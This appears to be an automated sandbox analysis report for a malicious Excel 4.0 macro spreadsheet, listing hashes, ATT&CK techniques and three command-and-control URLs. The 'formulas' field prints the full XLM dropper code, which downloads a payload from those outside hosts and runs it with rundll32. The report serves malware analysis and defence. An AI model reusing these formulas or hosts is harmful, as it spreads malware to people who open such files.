Overview

overview

10

Static

static

10

?i=1ddhggdgp.xlsm

windows7_x64

10

?i=1ddhggdgp.xlsm

windows10-2004_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ?i=1ddhggdgp

  • Size

    83KB

  • Sample

    220522-f6b2msbbhn

  • MD5

    88add4c02ddd08f3920ea988f584120a

  • SHA1

    413cee3adb3c80e16e87a9d168846c480291772f

  • SHA256

    5431cd4c5693f99cd843792b98dcb1a50f26e42db66186aebd56c2ae8b0053b6

  • SHA512

    c22114f39f7ed0d63de1f214d4e35c92612b07839051cefe801a486e5912e884843054bec9e46198f4f9d34c67ac67e508bf73a0a9cfcd63ec575dabc956cb0c

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.crownpacificpartners.com/guglio/Rt4el/

http://nbp-c.com/ya/O0BO5vb3z1MkWcDOqV2/

http://rjmtel.com/wp-content/bYAiTvGo635qKITG6/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.crownpacificpartners.com/guglio/Rt4el/","..\erum.ocx",0,0) =IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://nbp-c.com/ya/O0BO5vb3z1MkWcDOqV2/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://rjmtel.com/wp-content/bYAiTvGo635qKITG6/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\erum.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://www.crownpacificpartners.com/guglio/Rt4el/
xlm40.dropper

http://nbp-c.com/ya/O0BO5vb3z1MkWcDOqV2/
xlm40.dropper

http://rjmtel.com/wp-content/bYAiTvGo635qKITG6/

Targets

    • Target

      ?i=1ddhggdgp

    • Size

      83KB

    • MD5

      88add4c02ddd08f3920ea988f584120a

    • SHA1

      413cee3adb3c80e16e87a9d168846c480291772f

    • SHA256

      5431cd4c5693f99cd843792b98dcb1a50f26e42db66186aebd56c2ae8b0053b6

    • SHA512

      c22114f39f7ed0d63de1f214d4e35c92612b07839051cefe801a486e5912e884843054bec9e46198f4f9d34c67ac67e508bf73a0a9cfcd63ec575dabc956cb0c

    Score
    10/10
    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks